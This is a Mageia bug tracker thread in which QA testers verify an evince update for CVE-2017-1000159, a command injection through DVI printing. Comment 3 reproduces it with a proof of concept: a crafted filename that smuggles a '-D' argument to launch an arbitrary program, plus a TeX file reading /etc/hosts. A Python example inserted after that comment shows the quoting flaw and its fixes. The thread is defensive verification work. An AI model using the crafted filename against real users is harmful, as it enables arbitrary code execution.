Bug 22131 - evince new security issue CVE-2017-1000159
Summary: evince new security issue CVE-2017-1000159
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security
Version: 6
Hardware: All Linux
Priority: Normal major
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL:
Whiteboard: MGA5TOO MGA6-64-OK MGA5-64-OK mga5-32...
Keywords: advisory, validated_update
Depends on:
Blocks:
 
Reported: 2017-12-05 23:13 CET by David Walser
Modified: 2017-12-17 00:20 CET
CC: 6 users

See Also:
Source RPM: evince-3.24.1-1.mga6.src.rpm
CVE:
Status comment:


Attachments

Description David Walser 2017-12-05 23:13:22 CET
Ubuntu has issued an advisory on December 4:
https://usn.ubuntu.com/usn/usn-3503-1/

Mageia 5 is also affected.
David Walser 2017-12-05 23:13:30 CET

Whiteboard: (none) => MGA5TOO

Marja Van Waes 2017-12-06 12:49:18 CET

Assignee: bugsquad => gnome
CC: (none) => cvargas, marja11

Comment 1 Cesar Vargas 2017-12-09 05:08:15 CET
Available in updates_testing for MGA5 and MGA6.
Comment 2 David Walser 2017-12-09 18:11:14 CET
Advisory:
========================

Updated evince packages fix security vulnerability:

It was discovered that Evince incorrectly handled printing certain DVI files. If
a user were tricked into opening and printing a specially-named DVI file, an
attacker could use this issue to execute arbitrary code (CVE-2017-1000159).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000159
https://usn.ubuntu.com/usn/usn-3503-1/
========================

Updated packages in core/updates_testing:
========================
evince-3.14.2-2.1.mga5
evince-dvi-3.14.2-2.1.mga5
libevdocument3_4-3.14.2-2.1.mga5
libevview3_3-3.14.2-2.1.mga5
libevince-devel-3.14.2-2.1.mga5
libevince-gir3.0-3.14.2-2.1.mga5
evince-3.24.1-2.mga6
evince-dvi-3.24.1-2.mga6
libevdocument3_4-3.24.1-2.mga6
libevview3_3-3.24.1-2.mga6
libevince-devel-3.24.1-2.mga6
libevince-gir3.0-3.24.1-2.mga6

from SRPMS:
evince-3.14.2-2.1.mga5.src.rpm
evince-3.24.1-2.mga6.src.rpm

Assignee: gnome => qa-bugs

Comment 3 Len Lawrence 2017-12-10 16:22:55 CET
Mageia 6 :: x86_64

https://bugzilla.gnome.org/show_bug.cgi?id=784947
This link provides a possible POC which requires the following procedure, providing all the packages have been installed.

Create the file inclusion.tex -
$ cat inclusion.tex
foo bar baz
\special{psfile=/etc/hosts}
\bye

Run these commands, replacing galculator with any popup application you fancy.
$ dviluatex inclusion.tex
$ cp inclusion.dvi lame.dvi
'inclusion.dvi' -> 'lame.dvi'
$ cp inclusion.dvi 'lame.dvi" -D "galculator'
$ evince 'lame.dvi" -D "galculator'

From the print dialog (under find options) click 'Preview' and see what happens.
Using 'galculator' the calculator does pop up on screen.

Updated the six packages and ran the contrived procedure again.
Both before and after the update there were several lines of diagnostics and it looked like the messages were different.
The upshot is that the evince -> print -> preview sequence failed to launch galculator.

It is highly probable that the change was a result of the patch(es).
Created a sample.tex file; just text with \bye as the last line.
Without that the next command hangs waiting for commandline input (\bye terminates it).

$ dviluatex sample.tex
Output written on sample.dvi (1 page, 556 bytes).

evince is a document viewer which can deal with pdf, postscript, djvu, dvi and "Comic Book Archive" files.
$ evince sample.dvi
This opened the document and displayed the text without any newlines.

$ evince -i 44 sample.pdf
opened the document at page 25 (44 of 172).  Not sure what that means but
$ evince -p 44 sample.pdf
opens the file at page 44.
Navigation with left/right arrow keys.

$ evince -s sample.pdf
opens the document in presentation mode (slides).  Use left/right arrows to advance or go back, Esc to return to normal mode.

$ evince -l tkinter sample.pdf
opened the file at the first page to contain the given phrase, case insensitive.

$ evince ticket.ps
displayed a single page postscript file containing a coloured graph.

$ evince gitmanual.djvu
opened the file as a multiple page document navigable using the arrows, chapter links and by changing the page number field.

This is good for 64 bits.

CC: (none) => tarazed25
Whiteboard: MGA5TOO => MGA5TOO MGA6-64-OK
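
The reproduction in comment 3 turns on a quoting defect rather than on the DVI content itself: a converter command built as one string with the filename wrapped in double quotes is later split by shell word rules, so a `"` inside the name closes the quoted word early and the remainder of the name is parsed as further arguments to the converter. The script below is an added example, not evince's code and not from the bug reporter; it models that split with Python's `shlex`, using the comment 3 filename as the constructed input, and sets the vulnerable pattern beside the two fixes (quoting each untrusted word, which is the role `g_shell_quote` plays upstream, or passing an argv list so no splitting happens at all). The converter name `dvipdfm`, the `-o` flag layout and the helper names are assumptions for illustration.

```python
"""Added example (not evince's code): why wrapping an untrusted filename in
double quotes inside a shell command line is not a fix, and what is.

The vulnerable pattern modelled here is a converter command built as one
string and then split with shell word rules (the same rules GLib's
g_shell_parse_argv applies for g_spawn_command_line_sync). The converter
name 'dvipdfm' and the flag layout are assumptions for illustration; the
filename is the constructed one from comment 3 of this bug.
"""
import shlex

# Constructed input: the filename used in the comment 3 reproduction.
INJECTED_NAME = 'lame.dvi" -D "galculator'
CONVERTER = "dvipdfm"          # assumed converter binary name


def build_cmdline_naive(converter: str, dvi_path: str, out_path: str) -> list:
    """Vulnerable pattern: build a single command line with printf-style
    double quoting and let the shell parser split it. A '"' in the name ends
    the quoted word early, so the rest of the name becomes extra arguments."""
    cmdline = f'{converter} -o "{out_path}" "{dvi_path}"'
    return shlex.split(cmdline)


def build_cmdline_quoted(converter: str, dvi_path: str, out_path: str) -> list:
    """Mitigation 1: shell-quote each untrusted word before concatenation
    (what g_shell_quote does in the upstream fix). shlex.quote wraps the
    value in single quotes and escapes any embedded single quote, so the
    parser always returns the original value as exactly one word."""
    cmdline = f"{converter} -o {shlex.quote(out_path)} {shlex.quote(dvi_path)}"
    return shlex.split(cmdline)


def build_argv(converter: str, dvi_path: str, out_path: str) -> list:
    """Mitigation 2 (preferred): never build a command string at all.
    Hand an argv list to the spawner (g_spawn_sync, or subprocess.run without
    shell=True); no word splitting happens, so the name is one argument."""
    return [converter, "-o", out_path, dvi_path]


def filename_is_intact(argv: list, dvi_path: str) -> bool:
    """Review check for any such builder: the untrusted name must survive as
    exactly one argv element and no extra element (e.g. an unexpected '-D'
    flag) may have been synthesised from it. Four words are expected here:
    converter, -o, output path, input path."""
    return argv.count(dvi_path) == 1 and len(argv) == 4


if __name__ == "__main__":
    for builder in (build_cmdline_naive, build_cmdline_quoted, build_argv):
        argv = builder(CONVERTER, INJECTED_NAME, "out.pdf")
        ok = filename_is_intact(argv, INJECTED_NAME)
        print(f"{builder.__name__:21s} intact={ok} argv={argv}")
```

Running it shows the naive builder producing six words, with `-D` and `galculator` as separate converter arguments, while both mitigations keep the whole name as a single argument; `filename_is_intact` is the kind of assertion worth keeping in a regression test for any code path that turns a user-controlled path into a child-process command.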

Comment 4 Len Lawrence 2017-12-10 18:51:46 CET
Mageia 5 :: x86_64

Following the POC procedure from comment 3 resulted in failure.
evince had trouble with the filename 'lame.dvi" -D "galculator', reported errors and displayed a blank page from print -> preview.
Skipped POC test and updated the packages.

Created a sample.dvi from sample.tex and viewed it in evince.
Exercised evince on various other files in postscript, djvu and pdf formats.
In presentation mode it was possible to follow web links and the URLs appeared in firefox, but were hidden behind the presentation.
No obvious regressions.
Passing this for 64 bits.

Whiteboard: MGA5TOO MGA6-64-OK => MGA5TOO MGA6-64-OK MGA5-64-OK

Comment 5 Brian Rockwell 2017-12-11 06:01:51 CET
MGA 5 - 32 bit gnome

Created DVI from a document using latex.  Converted that to a DVI and opened in evince (updated version).

It was able to open the DVI and I scrolled through to the end and back.  Working as designed.

CC: (none) => brtians1
Whiteboard: MGA5TOO MGA6-64-OK MGA5-64-OK => MGA5TOO MGA6-64-OK MGA5-64-OK mga5-32-ok

Comment 6 Brian Rockwell 2017-12-11 23:42:08 CET
$ uname -a
Linux localhost 4.9.56-desktop-1.mga6 #1 SMP Thu Oct 12 22:53:48 UTC 2017 i686 i686 i686 GNU/Linux


The following 38 packages are going to be installed:

- cdialog-1.3-1.20160828.1.mga6.i586
- evince-3.24.1-2.mga6.i586
- evince-dvi-3.24.1-2.mga6.i586
- libevdocument3_4-3.24.1-2.mga6.i586
- libevview3_3-3.24.1-2.mga6.i586
- libkpathsea6-20160523-7.mga6.i586
- libnautilus1-3.24.1-1.mga6.i586
- libptexenc1-20160523-7.mga6.i586
- libsynctex1-20160523-7.mga6.i586
- libtexlua5-20160523-7.mga6.i586
- libzziplib0-0.13.62-8.mga6.i586
- perl-Algorithm-Diff-1.190.300-3.mga6.noarch
- perl-CGI-4.280.0-2.mga6.noarch
- perl-File-Copy-Recursive-0.380.0-11.mga6.noarch
- perl-File-HomeDir-1.0.0-9.mga6.noarch
- perl-File-Slurp-Tiny-0.4.0-3.mga6.noarch
- perl-File-Which-1.210.0-2.mga6.noarch
- perl-Font-AFM-1.200.0-7.mga6.noarch
- perl-HTML-Form-6.30.0-7.mga6.noarch
- perl-HTML-Format-2.110.0-5.mga6.noarch
- perl-HTML-Tree-5.30.0-12.mga6.noarch
- perl-HTTP-Server-Simple-0.510.0-3.mga6.noarch
- perl-Sub-Uplevel-0.250.0-3.mga6.noarch
- perl-Test-Warn-0.300.0-6.mga6.noarch
- perl-Tk-804.33.0-4.mga6.i586
- perl-Tree-DAG_Node-1.290.0-2.mga6.noarch
- perl-WWW-Mechanize-1.750.0-3.mga6.noarch
- perl-XML-XPath-1.360.0-2.mga6.noarch
- perl-YAML-Tiny-1.690.0-3.mga6.noarch
- ruby-2.2.8-1.mga6.i586
- ruby-irb-2.2.8-1.mga6.noarch
- ruby-json-1.8.3-3.1.mga6.i586
- ruby-rdoc-4.2.1-1.mga6.noarch
- ruby-RubyGems-2.4.8-7.mga6.noarch
- texlive-20160523-7.mga6.i586
- texlive-collection-basic-20160523-6.mga6.noarch
- texlive-dist-20160523-6.mga6.noarch
- texlive-texmf-20160523-6.mga6.noarch

1.6GB of additional disk space will be used.

816MB of packages will be retrieved.

Is it ok to continue?


Generated a DVI using latex.   Then opened with Evince.

Evince with DVI is one huge download for a mate desktop.

It worked.

Whiteboard: MGA5TOO MGA6-64-OK MGA5-64-OK mga5-32-ok => MGA5TOO MGA6-64-OK MGA5-64-OK mga5-32-ok mga6-32-ok

Comment 7 Len Lawrence 2017-12-12 00:12:27 CET
Thanks for your tests Brian.  This can now be validated.

CC: (none) => sysadmin-bugs
Keywords: (none) => validated_update

Dave Hodgins 2017-12-15 21:00:33 CET

Keywords: (none) => advisory
CC: (none) => davidwhodgins

Comment 8 Mageia Robot 2017-12-17 00:20:52 CET
An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2017-0450.html

Resolution: (none) => FIXED
Status: NEW => RESOLVED

